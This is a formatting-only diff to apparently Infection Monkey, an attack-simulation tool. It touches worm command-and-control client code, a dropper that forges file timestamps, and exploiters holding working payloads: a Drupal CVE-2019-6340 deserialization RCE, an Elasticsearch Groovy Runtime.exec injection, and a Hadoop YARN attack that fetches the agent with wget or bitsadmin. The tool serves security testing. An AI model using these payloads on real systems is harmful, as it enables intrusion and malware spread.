has_internet_access = check_internet_access(WormConfiguration.internet_services)
monkey = {
- "guid": GUID,
- "hostname": hostname,
- "ip_addresses": local_ips(),
- "description": " ".join(platform.uname()),
- "internet_access": has_internet_access,
- "config": WormConfiguration.as_dict(),
- "parent": parent,
+ "guid":GUID,
+ "hostname":hostname,
+ "ip_addresses":local_ips(),
+ "description":" ".join(platform.uname()),
+ "internet_access":has_internet_access,
+ "config":WormConfiguration.as_dict(),
+ "parent":parent,
}
if ControlClient.proxies:
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.post(
- "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(monkey),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=20,
+ "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(monkey),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=20,
)
@staticmethod
def find_server(default_tunnel=None):
LOG.debug(
- "Trying to wake up with Monkey Island servers list: %r"
- % WormConfiguration.command_servers
+ "Trying to wake up with Monkey Island servers list: %r"
+ % WormConfiguration.command_servers
)
if default_tunnel:
LOG.debug("default_tunnel: %s" % (default_tunnel,))
@@ -93,10 +93,10 @@ class ControlClient(object):
debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message)
requests.get(
- f"https://{server}/api?action=is-up", # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=TIMEOUT_IN_SECONDS,
+ f"https://{server}/api?action=is-up", # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=TIMEOUT_IN_SECONDS,
)
WormConfiguration.current_server = current_server
break
@@ -131,17 +131,18 @@ class ControlClient(object):
if ControlClient.proxies:
monkey["tunnel"] = ControlClient.proxies.get("https")
requests.patch(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- data=json.dumps(monkey),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ data=json.dumps(monkey),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return {}
@@ -149,23 +150,25 @@ class ControlClient(object):
def send_telemetry(telem_category, json_data: str):
if not WormConfiguration.current_server:
LOG.error(
- "Trying to send %s telemetry before current server is established, aborting."
- % telem_category
+ "Trying to send %s telemetry before current server is established, aborting."
+ % telem_category
)
return
try:
- telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data}
+ telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
requests.post(
- "https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(telemetry),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/telemetry" % (WormConfiguration.current_server,),
+ # noqa: DUO123
+ data=json.dumps(telemetry),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -173,18 +176,19 @@ class ControlClient(object):
if not WormConfiguration.current_server:
return
try:
- telemetry = {"monkey_guid": GUID, "log": json.dumps(log)}
+ telemetry = {"monkey_guid":GUID, "log":json.dumps(log)}
requests.post(
- "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(telemetry),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(telemetry),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -193,32 +197,33 @@ class ControlClient(object):
return
try:
reply = requests.get(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return
try:
unknown_variables = WormConfiguration.from_kv(reply.json().get("config"))
LOG.info(
- "New configuration was loaded from server: %r"
- % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
+ "New configuration was loaded from server: %r"
+ % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)
)
except Exception as exc:
# we don't continue with default conf here because it might be dangerous
LOG.error(
- "Error parsing JSON reply from control server %s (%s): %s",
- WormConfiguration.current_server,
- reply._content,
- exc,
+ "Error parsing JSON reply from control server %s (%s): %s",
+ WormConfiguration.current_server,
+ reply._content,
+ exc,
)
raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc)
@@ -231,17 +236,18 @@ class ControlClient(object):
return
try:
requests.patch(
- "https://%s/api/monkey/%s"
- % (WormConfiguration.current_server, GUID), # noqa: DUO123
- data=json.dumps({"config_error": True}),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/%s"
+ % (WormConfiguration.current_server, GUID), # noqa: DUO123
+ data=json.dumps({"config_error":True}),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return {}
@@ -260,7 +266,7 @@ class ControlClient(object):
@staticmethod
def download_monkey_exe_by_os(is_windows, is_32bit):
filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict(
- ControlClient.spoof_host_os_info(is_windows, is_32bit)
+ ControlClient.spoof_host_os_info(is_windows, is_32bit)
)
if filename is None:
return None
@@ -281,7 +287,7 @@ class ControlClient(object):
else:
arch = "x86_64"
- return {"os": {"type": os, "machine": arch}}
+ return {"os":{"type":os, "machine":arch}}
@staticmethod
def download_monkey_exe_by_filename(filename, size):
@@ -293,11 +299,11 @@ class ControlClient(object):
return dest_file
else:
download = requests.get(
- "https://%s/api/monkey/download/%s"
- % (WormConfiguration.current_server, filename), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/download/%s"
+ % (WormConfiguration.current_server, filename), # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
with monkeyfs.open(dest_file, "wb") as file_obj:
@@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
@staticmethod
@@ -323,13 +330,13 @@ class ControlClient(object):
return None, None
try:
reply = requests.post(
- "https://%s/api/monkey/download"
- % (WormConfiguration.current_server,), # noqa: DUO123
- data=json.dumps(host_dict),
- headers={"content-type": "application/json"},
- verify=False,
- proxies=ControlClient.proxies,
- timeout=LONG_REQUEST_TIMEOUT,
+ "https://%s/api/monkey/download"
+ % (WormConfiguration.current_server,), # noqa: DUO123
+ data=json.dumps(host_dict),
+ headers={"content-type":"application/json"},
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=LONG_REQUEST_TIMEOUT,
)
if 200 == reply.status_code:
result_json = reply.json()
@@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
- "Error connecting to control server %s: %s", WormConfiguration.current_server, exc
+ "Error connecting to control server %s: %s", WormConfiguration.current_server,
+ exc
)
return None, None
@@ -371,10 +379,11 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
- PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
- verify=False,
- proxies=ControlClient.proxies,
- timeout=LONG_REQUEST_TIMEOUT,
+ PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),
+ # noqa: DUO123
+ verify=False,
+ proxies=ControlClient.proxies,
+ timeout=LONG_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@@ -383,14 +392,14 @@ class ControlClient(object):
def get_T1216_pba_file():
try:
return requests.get(
- urljoin(
- f"https://{WormConfiguration.current_server}/", # noqa: DUO123
- T1216_PBA_FILE_DOWNLOAD_PATH,
- ),
- verify=False,
- proxies=ControlClient.proxies,
- stream=True,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ urljoin(
+ f"https://{WormConfiguration.current_server}/", # noqa: DUO123
+ T1216_PBA_FILE_DOWNLOAD_PATH,
+ ),
+ verify=False,
+ proxies=ControlClient.proxies,
+ stream=True,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
except requests.exceptions.RequestException:
return False
@@ -398,21 +407,24 @@ class ControlClient(object):
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if (
- vulnerable_port
- and WormConfiguration.get_hop_distance_to_island() > 1
- and ControlClient.can_island_see_port(vulnerable_port)
- and WormConfiguration.started_on_island
+ vulnerable_port
+ and WormConfiguration.get_hop_distance_to_island() > 1
+ and ControlClient.can_island_see_port(vulnerable_port)
+ and WormConfiguration.started_on_island
):
raise PlannedShutdownException(
- "Monkey shouldn't run on current machine "
- "(it will be exploited later with more depth)."
+ "Monkey shouldn't run on current machine "
+ "(it will be exploited later with more depth)."
)
return True
@staticmethod
def can_island_see_port(port):
try:
- url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
+ url = (
+ f"https://{WormConfiguration.current_server}/api/monkey_control"
+ f"/check_remote_port/{port}"
+ )
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"
@@ -422,8 +434,8 @@ class ControlClient(object):
@staticmethod
def report_start_on_island():
requests.post(
- f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
- data=json.dumps({"started_on_island": True}),
- verify=False,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
+ data=json.dumps({"started_on_island":True}),
+ verify=False,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py
index 74c20321b..fdb649cad 100644
--- a/monkey/infection_monkey/dropper.py
+++ b/monkey/infection_monkey/dropper.py
@@ -53,8 +53,8 @@ class MonkeyDrops(object):
self.opts, _ = arg_parser.parse_known_args(args)
self._config = {
- "source_path": os.path.abspath(sys.argv[0]),
- "destination_path": self.opts.location,
+ "source_path":os.path.abspath(sys.argv[0]),
+ "destination_path":self.opts.location,
}
def initialize(self):
@@ -80,18 +80,18 @@ class MonkeyDrops(object):
shutil.move(self._config["source_path"], self._config["destination_path"])
LOG.info(
- "Moved source file '%s' into '%s'",
- self._config["source_path"],
- self._config["destination_path"],
+ "Moved source file '%s' into '%s'",
+ self._config["source_path"],
+ self._config["destination_path"],
)
file_moved = True
except (WindowsError, IOError, OSError) as exc:
LOG.debug(
- "Error moving source file '%s' into '%s': %s",
- self._config["source_path"],
- self._config["destination_path"],
- exc,
+ "Error moving source file '%s' into '%s': %s",
+ self._config["source_path"],
+ self._config["destination_path"],
+ exc,
)
# if file still need to change path, copy it
@@ -100,16 +100,16 @@ class MonkeyDrops(object):
shutil.copy(self._config["source_path"], self._config["destination_path"])
LOG.info(
- "Copied source file '%s' into '%s'",
- self._config["source_path"],
- self._config["destination_path"],
+ "Copied source file '%s' into '%s'",
+ self._config["source_path"],
+ self._config["destination_path"],
)
except (WindowsError, IOError, OSError) as exc:
LOG.error(
- "Error copying source file '%s' into '%s': %s",
- self._config["source_path"],
- self._config["destination_path"],
- exc,
+ "Error copying source file '%s' into '%s': %s",
+ self._config["source_path"],
+ self._config["destination_path"],
+ exc,
)
return False
@@ -117,7 +117,7 @@ class MonkeyDrops(object):
if WormConfiguration.dropper_set_date:
if sys.platform == "win32":
dropper_date_reference_path = os.path.expandvars(
- WormConfiguration.dropper_date_reference_path_windows
+ WormConfiguration.dropper_date_reference_path_windows
)
else:
dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux
@@ -125,58 +125,59 @@ class MonkeyDrops(object):
ref_stat = os.stat(dropper_date_reference_path)
except OSError:
LOG.warning(
- "Cannot set reference date using '%s', file not found",
- dropper_date_reference_path,
+ "Cannot set reference date using '%s', file not found",
+ dropper_date_reference_path,
)
else:
try:
os.utime(
- self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
+ self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime)
)
except OSError:
LOG.warning("Cannot set reference date to destination file")
monkey_options = build_monkey_commandline_explicitly(
- parent=self.opts.parent,
- tunnel=self.opts.tunnel,
- server=self.opts.server,
- depth=self.opts.depth,
- location=None,
- vulnerable_port=self.opts.vulnerable_port,
+ parent=self.opts.parent,
+ tunnel=self.opts.tunnel,
+ server=self.opts.server,
+ depth=self.opts.depth,
+ location=None,
+ vulnerable_port=self.opts.vulnerable_port,
)
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = (
- MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]}
- + monkey_options
+ MONKEY_CMDLINE_WINDOWS % {"monkey_path":self._config["destination_path"]}
+ + monkey_options
)
else:
dest_path = self._config["destination_path"]
- # In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
+ # In linux we have a more complex commandline. There's a general outer one,
+ # and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
- MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]}
- + monkey_options
+ MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
+ + monkey_options
)
monkey_cmdline = GENERAL_CMDLINE_LINUX % {
- "monkey_directory": dest_path[0 : dest_path.rfind("/")],
- "monkey_commandline": inner_monkey_cmdline,
+ "monkey_directory":dest_path[0: dest_path.rfind("/")],
+ "monkey_commandline":inner_monkey_cmdline,
}
monkey_process = subprocess.Popen(
- monkey_cmdline,
- shell=True,
- stdin=subprocess.PIPE,
- stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- close_fds=True,
- creationflags=DETACHED_PROCESS,
+ monkey_cmdline,
+ shell=True,
+ stdin=subprocess.PIPE,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE,
+ close_fds=True,
+ creationflags=DETACHED_PROCESS,
)
LOG.info(
- "Executed monkey process (PID=%d) with command line: %s",
- monkey_process.pid,
- monkey_cmdline,
+ "Executed monkey process (PID=%d) with command line: %s",
+ monkey_process.pid,
+ monkey_cmdline,
)
time.sleep(3)
@@ -188,9 +189,10 @@ class MonkeyDrops(object):
try:
if (
- (self._config["source_path"].lower() != self._config["destination_path"].lower())
- and os.path.exists(self._config["source_path"])
- and WormConfiguration.dropper_try_move_first
+ (self._config["source_path"].lower() != self._config[
+ "destination_path"].lower())
+ and os.path.exists(self._config["source_path"])
+ and WormConfiguration.dropper_try_move_first
):
# try removing the file first
@@ -198,23 +200,24 @@ class MonkeyDrops(object):
os.remove(self._config["source_path"])
except Exception as exc:
LOG.debug(
- "Error removing source file '%s': %s", self._config["source_path"], exc
+ "Error removing source file '%s': %s", self._config["source_path"], exc
)
# mark the file for removal on next boot
dropper_source_path_ctypes = c_char_p(self._config["source_path"])
if 0 == ctypes.windll.kernel32.MoveFileExA(
- dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
+ dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
- "Error marking source file '%s' for deletion on next boot (error %d)",
- self._config["source_path"],
- ctypes.windll.kernel32.GetLastError(),
+ "Error marking source file '%s' for deletion on next boot (error "
+ "%d)",
+ self._config["source_path"],
+ ctypes.windll.kernel32.GetLastError(),
)
else:
LOG.debug(
- "Dropper source file '%s' is marked for deletion on next boot",
- self._config["source_path"],
+ "Dropper source file '%s' is marked for deletion on next boot",
+ self._config["source_path"],
)
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send()
diff --git a/monkey/infection_monkey/exploit/HostExploiter.py b/monkey/infection_monkey/exploit/HostExploiter.py
index e5bdf6dfe..857137c7c 100644
--- a/monkey/infection_monkey/exploit/HostExploiter.py
+++ b/monkey/infection_monkey/exploit/HostExploiter.py
@@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
-
logger = logging.getLogger(__name__)
@@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
- # Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
+ # Generally, should be True for RCE type exploiters and False if we don't expect the
+ # exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True
@@ -49,12 +49,12 @@ class HostExploiter(Plugin):
def __init__(self, host):
self._config = WormConfiguration
self.exploit_info = {
- "display_name": self._EXPLOITED_SERVICE,
- "started": "",
- "finished": "",
- "vulnerable_urls": [],
- "vulnerable_ports": [],
- "executed_cmds": [],
+ "display_name":self._EXPLOITED_SERVICE,
+ "started":"",
+ "finished":"",
+ "vulnerable_urls":[],
+ "vulnerable_ports":[],
+ "executed_cmds":[],
}
self.exploit_attempts = []
self.host = host
@@ -75,14 +75,14 @@ class HostExploiter(Plugin):
def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""):
self.exploit_attempts.append(
- {
- "result": result,
- "user": user,
- "password": password,
- "lm_hash": lm_hash,
- "ntlm_hash": ntlm_hash,
- "ssh_key": ssh_key,
- }
+ {
+ "result":result,
+ "user":user,
+ "password":password,
+ "lm_hash":lm_hash,
+ "ntlm_hash":ntlm_hash,
+ "ssh_key":ssh_key,
+ }
)
def exploit_host(self):
@@ -120,4 +120,4 @@ class HostExploiter(Plugin):
:param cmd: String of executed command. e.g. 'echo Example'
"""
powershell = True if "powershell" in cmd.lower() else False
- self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
+ self.exploit_info["executed_cmds"].append({"cmd":cmd, "powershell":powershell})
diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py
index efbbc2f56..aaeba8f1c 100644
--- a/monkey/infection_monkey/exploit/drupal.py
+++ b/monkey/infection_monkey/exploit/drupal.py
@@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
- https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
+ https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88
+ /f9f6a5bb6605745e292bee3a4079f261d891738a.
"""
import logging
@@ -28,7 +29,8 @@ class DrupalExploiter(WebRCE):
def get_exploit_config(self):
"""
- We override this function because the exploits requires a special extension in the URL, "node",
+ We override this function because the exploits requires a special extension in the URL,
+ "node",
e.g. an exploited URL would be http://172.1.2.3:/node/3.
:return: the Drupal exploit config
"""
@@ -42,7 +44,8 @@ class DrupalExploiter(WebRCE):
def add_vulnerable_urls(self, potential_urls, stop_checking=False):
"""
- We need a specific implementation of this function in order to add the URLs *with the node IDs*.
+ We need a specific implementation of this function in order to add the URLs *with the
+ node IDs*.
We therefore check, for every potential URL, all possible node IDs.
:param potential_urls: Potentially-vulnerable URLs
:param stop_checking: Stop if one vulnerable URL is found
@@ -58,7 +61,7 @@ class DrupalExploiter(WebRCE):
node_url = urljoin(url, str(node_id))
if self.check_if_exploitable(node_url):
self.add_vuln_url(
- url
+ url
) # This is for report. Should be refactored in the future
self.vulnerable_urls.append(node_url)
if stop_checking:
@@ -71,7 +74,8 @@ class DrupalExploiter(WebRCE):
def check_if_exploitable(self, url):
"""
Check if a certain URL is exploitable.
- We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
+ We use this specific implementation (and not simply run self.exploit) because this
+ function does not "waste"
a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
:param url: Drupal's URL and port
:return: Vulnerable URL if exploitable, otherwise False
@@ -79,11 +83,11 @@ class DrupalExploiter(WebRCE):
payload = build_exploitability_check_payload(url)
response = requests.get(
- f"{url}?_format=hal_json", # noqa: DUO123
- json=payload,
- headers={"Content-Type": "application/hal+json"},
- verify=False,
- timeout=MEDIUM_REQUEST_TIMEOUT,
+ f"{url}?_format=hal_json", # noqa: DUO123
+ json=payload,
+ headers={"Content-Type":"application/hal+json"},
+ verify=False,
+ timeout=MEDIUM_REQUEST_TIMEOUT,
)
if is_response_cached(response):
@@ -99,11 +103,11 @@ class DrupalExploiter(WebRCE):
payload = build_cmd_execution_payload(base, cmd)
r = requests.get(
- f"{url}?_format=hal_json", # noqa: DUO123
- json=payload,
- headers={"Content-Type": "application/hal+json"},
- verify=False,
- timeout=LONG_REQUEST_TIMEOUT,
+ f"{url}?_format=hal_json", # noqa: DUO123
+ json=payload,
+ headers={"Content-Type":"application/hal+json"},
+ verify=False,
+ timeout=LONG_REQUEST_TIMEOUT,
)
if is_response_cached(r):
@@ -117,7 +121,8 @@ class DrupalExploiter(WebRCE):
def get_target_url(self):
"""
- We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
+ We're overriding this method such that every time self.exploit is invoked, we use a fresh
+ vulnerable URL.
Reusing the same URL eliminates its exploitability because of caching reasons :)
:return: vulnerable URL to exploit
"""
@@ -128,14 +133,16 @@ class DrupalExploiter(WebRCE):
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
:return: Whether the list of vulnerable URLs has at least 5 elements.
"""
- # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey, chmod it and run it.
+ # We need 5 URLs for a "full-chain": check remote files, check architecture, drop monkey,
+ # chmod it and run it.
num_urls_needed_for_full_exploit = 5
num_available_urls = len(self.vulnerable_urls)
result = num_available_urls >= num_urls_needed_for_full_exploit
if not result:
LOG.info(
- f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server "
- f"but only {num_available_urls} found"
+ f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a "
+ f"Drupal server "
+ f"but only {num_available_urls} found"
)
return result
@@ -151,7 +158,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
while lower < upper:
node_url = urljoin(base_url, str(lower))
response = requests.get(
- node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
+ node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT
) # noqa: DUO123
if response.status_code == 200:
if is_response_cached(response):
@@ -164,30 +171,30 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
def build_exploitability_check_payload(url):
payload = {
- "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
- "type": {"target_id": "article"},
- "title": {"value": "My Article"},
- "body": {"value": ""},
+ "_links":{"type":{"href":f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}},
+ "type":{"target_id":"article"},
+ "title":{"value":"My Article"},
+ "body":{"value":""},
}
return payload
def build_cmd_execution_payload(base, cmd):
payload = {
- "link": [
+ "link":[
{
- "value": "link",
- "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
- 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
- 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
- '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
- 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
- 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
- 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
- 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
- "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
+ "value":"link",
+ "options":'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000'
+ 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"'
+ 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:'
+ '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
+ 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000'
+ 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000'
+ 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"'
+ 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'
+ "".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
- "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
+ "_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload
diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py
index ca1c0408b..aff5e1ffd 100644
--- a/monkey/infection_monkey/exploit/elasticgroovy.py
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py
@@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
- https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
+ https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
+ /modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@@ -33,11 +34,12 @@ class ElasticGroovyExploiter(WebRCE):
# attack URLs
MONKEY_RESULT_FIELD = "monkey_result"
GENERIC_QUERY = (
- """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
+ """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD
)
JAVA_CMD = (
- GENERIC_QUERY
- % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
+ GENERIC_QUERY
+ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
+ \\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@@ -51,13 +53,14 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
- "linux": WGET_HTTP_UPLOAD,
- "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
+ "linux":WGET_HTTP_UPLOAD,
+ "windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config
def get_open_service_ports(self, port_list, names):
- # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
+ # We must append elastic port we get from elastic fingerprint module because It's not
+ # marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
- "Elastic couldn't upload monkey, because server didn't respond to upload request."
+ "Elastic couldn't upload monkey, because server didn't respond to upload "
+ "request."
)
return False
result = self.get_results(response)
diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index d92c39f6c..02ec81652 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
- Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
+ Implementation is based on code from
+ https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@@ -63,25 +64,27 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
- posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
+ posixpath.join(url, "ws/v1/cluster/apps/new-application"),
+ timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
# Create a random name for our application in YARN
